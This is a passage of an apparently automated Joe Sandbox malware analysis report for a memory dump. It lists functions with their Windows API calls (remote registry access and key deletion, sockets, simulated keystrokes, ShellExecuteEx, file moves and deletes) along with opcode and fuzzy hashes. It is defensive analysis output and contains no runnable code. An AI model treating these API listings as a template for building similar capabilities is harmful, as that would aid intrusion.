Part of subcall function 00DA3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DA2AA6,?,?), ref: 00DA3B0E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DA2AE7

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper_memmove
String ID:
API String ID: 3479070676-0
Opcode ID: 2276d6454a932529bbbc4f6f663d78dc64eb2f513513c902ad2454db912b8e39
Instruction ID: cd9c5b631601616f81cc4a0b462d8b6dffc3e9eb61ea556839e1786cbf3ff0b5
Opcode Fuzzy Hash: 2276d6454a932529bbbc4f6f663d78dc64eb2f513513c902ad2454db912b8e39
Instruction Fuzzy Hash: 36916B712042019FCB04EF59C891B6EB7E5FF89310F18841DF996972A1DB35E945CB72

Function 00D99A66 Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON

Download Yara Rule

APIs

select.WS2_32 ref: 00D99B38
WSAGetLastError.WS2_32(00000000), ref: 00D99B45
__WSAFDIsSet.WS2_32(00000000,?), ref: 00D99B6F
WSAGetLastError.WS2_32(00000000), ref: 00D99B9F
htons.WS2_32(?), ref: 00D99C51
inet_ntoa.WS2_32(?), ref: 00D99C0C

Part of subcall function 00D7E0F5: _strlen.LIBCMT ref: 00D7E0FF
Part of subcall function 00D7E0F5: _memmove.LIBCMT ref: 00D7E121

_strlen.LIBCMT ref: 00D99CA7
_memmove.LIBCMT ref: 00D99D10

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
String ID:
API String ID: 3637404534-0
Opcode ID: e1ef8045f2ebd15e3fc463bbcb83243c421d9b1e3eab002c0641a7d0d64785e1
Instruction ID: e6e60761c41f8e339c5429ca577be00ae9ed1fbc22d1432c6810c753fcb3a8af
Opcode Fuzzy Hash: e1ef8045f2ebd15e3fc463bbcb83243c421d9b1e3eab002c0641a7d0d64785e1
Instruction Fuzzy Hash: 1E81AC71504200AFDB10EF68DC95E6BB7E9EB84724F14462DF9569B291EB30DD04CBB2

Function 00D6B72C Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

__mtinitlocknum.LIBCMT ref: 00D6B744

Part of subcall function 00D68A0C: __FF_MSGBANNER.LIBCMT ref: 00D68A21
Part of subcall function 00D68A0C: __NMSG_WRITE.LIBCMT ref: 00D68A28
Part of subcall function 00D68A0C: __malloc_crt.LIBCMT ref: 00D68A48

__lock.LIBCMT ref: 00D6B757
__lock.LIBCMT ref: 00D6B7A3
InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00DF6948,00000018,00D76C2B,?,00000000,00000109), ref: 00D6B7BF
RtlEnterCriticalSection.NTDLL(8000000C), ref: 00D6B7DC
RtlLeaveCriticalSection.NTDLL(8000000C), ref: 00D6B7EC

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
String ID:
API String ID: 1422805418-0
Opcode ID: b8c0498d49935352fcdaeba42c69c82113857f3898b698e22cc92349afc500e9
Instruction ID: 2ffe91d4aff7b6e614aeb4a6a1deca10767343acc402eadadad0c3db615fa7d0
Opcode Fuzzy Hash: b8c0498d49935352fcdaeba42c69c82113857f3898b698e22cc92349afc500e9
Instruction Fuzzy Hash: 94412571D003168BEB109FA8D8447ACBBA8FF81335F14832AE525EB2D1D7749985CBB0

Function 00D8A1B7 Relevance: 12.1, APIs: 8, Instructions: 100fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00D8A1CE

Part of subcall function 00D6010A: std::exception::exception.LIBCMT ref: 00D6013E
Part of subcall function 00D6010A: __CxxThrowException@8.LIBCMT ref: 00D60153

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00D8A205
RtlEnterCriticalSection.NTDLL(?), ref: 00D8A221
_memmove.LIBCMT ref: 00D8A26F
_memmove.LIBCMT ref: 00D8A28C
RtlLeaveCriticalSection.NTDLL(?), ref: 00D8A29B
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00D8A2B0
InterlockedExchange.KERNEL32(?,000001F6), ref: 00D8A2CF

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: af8d1ba40d9f3ed0c8ec602279a77edff9cad8ac9928890f13e2837bbb04377c
Instruction ID: 3ee4887de75e0d4b2efd0b1ece89e5ce455a071e4049ff31f0c780cef442c619
Opcode Fuzzy Hash: af8d1ba40d9f3ed0c8ec602279a77edff9cad8ac9928890f13e2837bbb04377c
Instruction Fuzzy Hash: 5A319031900206EBDF10EF98DC85EAEBBB9EF45310B1480A5F904EB256DB74DA15CB75

Function 00DA8CDB Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00DA8CF3
GetDC.USER32(00000000), ref: 00DA8CFB
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DA8D06
ReleaseDC.USER32(00000000,00000000), ref: 00DA8D12
CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00DA8D4E
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00DA8D5F
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00DABB29,?,?,000000FF,00000000,?,000000FF,?), ref: 00DA8D99
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00DA8DB9

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: dcd6d09fd3dbf64a4c6cb4c4550735f868cc14a640bdd1abfdba76fdbd3f2fa9
Instruction ID: f4966e4ac1ceb3298011d8284178ec793662ea06afaf2598c89daa0624b2c976
Opcode Fuzzy Hash: dcd6d09fd3dbf64a4c6cb4c4550735f868cc14a640bdd1abfdba76fdbd3f2fa9
Instruction Fuzzy Hash: 00317F72141215BFEF108F55CC49FEA3BAAEF4A755F084065FE08DA291CA759C41CB74

Function 00D5B40F Relevance: 10.7, APIs: 7, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7452bcbaae66b62308d3efb231b980c83017b2402d5adfe5fe0fa86be4985737
Instruction ID: 488c24e6fe94afbcdf2a38d8a5a5e2eec218e18c35dfab883eddf2eca6711fbd
Opcode Fuzzy Hash: 7452bcbaae66b62308d3efb231b980c83017b2402d5adfe5fe0fa86be4985737
Instruction Fuzzy Hash: AA714971900209EFCF14CF98CC88AAEBB75FF85325F24815AFD55AA251D7309A45CB70

Function 00DA2121 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DA214B
_memset.LIBCMT ref: 00DA2214
ShellExecuteExW.SHELL32(?), ref: 00DA2259

Part of subcall function 00D484A6: __swprintf.LIBCMT ref: 00D484E5
Part of subcall function 00D484A6: __itow.LIBCMT ref: 00D48519

Part of subcall function 00D43BCF: _wcscpy.LIBCMT ref: 00D43BF2

CloseHandle.KERNEL32(00000000), ref: 00DA2320
FreeLibrary.KERNEL32(00000000), ref: 00DA232F

Strings

@, xrefs: 00DA2225

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
String ID: @
API String ID: 4082843840-2766056989
Opcode ID: ad722cd75778855130c515506d85af635c57425df5a8d789dc91aeabac3d717c
Instruction ID: e8e1a298aad7809ba435a67db069aae0777309c58af0bd08dcc5ac1559a3fe47
Opcode Fuzzy Hash: ad722cd75778855130c515506d85af635c57425df5a8d789dc91aeabac3d717c
Instruction Fuzzy Hash: 57716D75A006199FCF04EFA9C8859AEB7F5FF49310B148059E855AB351DB34AE40CBB0

Function 00D847DE Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00D8481D
GetKeyboardState.USER32(?), ref: 00D84832
SetKeyboardState.USER32(?), ref: 00D84893
PostMessageW.USER32(?,00000101,00000010,?), ref: 00D848C1
PostMessageW.USER32(?,00000101,00000011,?), ref: 00D848E0
PostMessageW.USER32(?,00000101,00000012,?), ref: 00D84926
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00D84949

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: cbbb1e4e92bd1b07ace77808ac6e7d019da9800f92f4b681bb33b68cc511d75c
Instruction ID: 55a024e029e2f278df04496352f11aba9aef317f6ff4a6c5e24d00422e8ff14f
Opcode Fuzzy Hash: cbbb1e4e92bd1b07ace77808ac6e7d019da9800f92f4b681bb33b68cc511d75c
Instruction Fuzzy Hash: 6B51C3A06187D73DFB3666248C45BBBBEA95F06304F0C858DE1D9568C2C6E4EC84DB70

Function 00D845F9 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00D84638
GetKeyboardState.USER32(?), ref: 00D8464D
SetKeyboardState.USER32(?), ref: 00D846AE
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00D846DA
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00D846F7
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00D8473B
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00D8475C

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: dc8a7ffbd1bf39a764f4e1ac669467e2e8597cc2c9a49fde453b7c7f78e88939
Instruction ID: daea222b8f73ffe085272d262f2e8f80ab6864ca5ced008f021ac6d6ccc37a01
Opcode Fuzzy Hash: dc8a7ffbd1bf39a764f4e1ac669467e2e8597cc2c9a49fde453b7c7f78e88939
Instruction Fuzzy Hash: AB51F7A05047D73DFB36A7248C56BBABF99AB07304F0C8499E1D5468C2E394EC98D770

Function 00D886AE Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00D886BB
_wcsncpy.LIBCMT ref: 00D886F0
_wcsncpy.LIBCMT ref: 00D88722
_wcsncpy.LIBCMT ref: 00D88755
_wcsncpy.LIBCMT ref: 00D88797
_wcsncpy.LIBCMT ref: 00D887D1
_wcsncpy.LIBCMT ref: 00D88800

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 7dbf0cdf308f793dc651f97d50870021eb477ad9083c4e3d2aca8db17adc234e
Instruction ID: e1cbdda5a15d8095b26d52b79f51d46727b5619619e94a1b5ef70535abb3cd22
Opcode Fuzzy Hash: 7dbf0cdf308f793dc651f97d50870021eb477ad9083c4e3d2aca8db17adc234e
Instruction Fuzzy Hash: 25413F65C106147ACB10EBB4CC8A9DEB7BCEF09350F948866E554F3121EA30E65587B9

Function 00DA3C63 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00DA3C92
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DA3CBC
FreeLibrary.KERNEL32(00000000), ref: 00DA3D71

Part of subcall function 00DA3C63: RegCloseKey.ADVAPI32(?), ref: 00DA3CD9
Part of subcall function 00DA3C63: FreeLibrary.KERNEL32(?), ref: 00DA3D2B
Part of subcall function 00DA3C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00DA3D4E

RegDeleteKeyW.ADVAPI32(?,?), ref: 00DA3D16

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 5aad93d7f155fca0ad8d86ca5585ae3cb714ab9b7329810038fc1570cd3f3561
Instruction ID: b3a110bdf3742763ca364a5bc43142acf8e9bdee142b5f2afccbc20079d81091
Opcode Fuzzy Hash: 5aad93d7f155fca0ad8d86ca5585ae3cb714ab9b7329810038fc1570cd3f3561
Instruction Fuzzy Hash: 6631F7B191120ABFDB159B94DC89EFEB7BEEB09300F14056AB512E2150D7709F499B70

Function 00DA8DD5 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00DA8DF4
GetWindowLongW.USER32(011597A8,000000F0), ref: 00DA8E27
GetWindowLongW.USER32(011597A8,000000F0), ref: 00DA8E5C
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00DA8E8E
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00DA8EB8
GetWindowLongW.USER32(?,000000F0), ref: 00DA8EC9
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DA8EE3

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 0d2f05b075bf99a045e5c4a60e41d7f4a86e84f608e8801aba1ed13b860ac9f4
Instruction ID: cf9c2d0de8d8be70e397518fa570a48af314faba6f0dc72fa0b3db285204c300
Opcode Fuzzy Hash: 0d2f05b075bf99a045e5c4a60e41d7f4a86e84f608e8801aba1ed13b860ac9f4
Instruction Fuzzy Hash: A4312031640216EFDB24CF59DC84F5537A2EB4A314F1841A4F9058F2B2CB72AE80EB60

Function 00D816F1 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D81734
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D8175A
SysAllocString.OLEAUT32(00000000), ref: 00D8175D
SysAllocString.OLEAUT32(?), ref: 00D8177B
SysFreeString.OLEAUT32(?), ref: 00D81784
StringFromGUID2.COMBASE(?,?,00000028), ref: 00D817A9
SysAllocString.OLEAUT32(?), ref: 00D817B7

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: bac287c48aaef27c705aa5dbe6c7d544b26524d5659b37251326b4912916fb1a
Instruction ID: 5eb951992ae8b08f5d37db6de9198076db9d7d853aed634f5bcb7dffe6aef2b2
Opcode Fuzzy Hash: bac287c48aaef27c705aa5dbe6c7d544b26524d5659b37251326b4912916fb1a
Instruction Fuzzy Hash: 5221A47960031AAF9B10AFA8CC88CBF77EDEB09360B458129F945DB250DB70EC468770

Function 00D869F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D431B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00D431DA

lstrcmpiW.KERNEL32(?,?), ref: 00D86A2B
_wcscmp.LIBCMT ref: 00D86A49
MoveFileW.KERNEL32(?,?), ref: 00D86A62

Part of subcall function 00D86D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00D86DBA
Part of subcall function 00D86D6D: GetLastError.KERNEL32 ref: 00D86DC5
Part of subcall function 00D86D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00D86DD9

_wcscat.LIBCMT ref: 00D86AA4
SHFileOperationW.SHELL32(?), ref: 00D86B0C

Strings

\*.*, xrefs: 00D86A9E

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
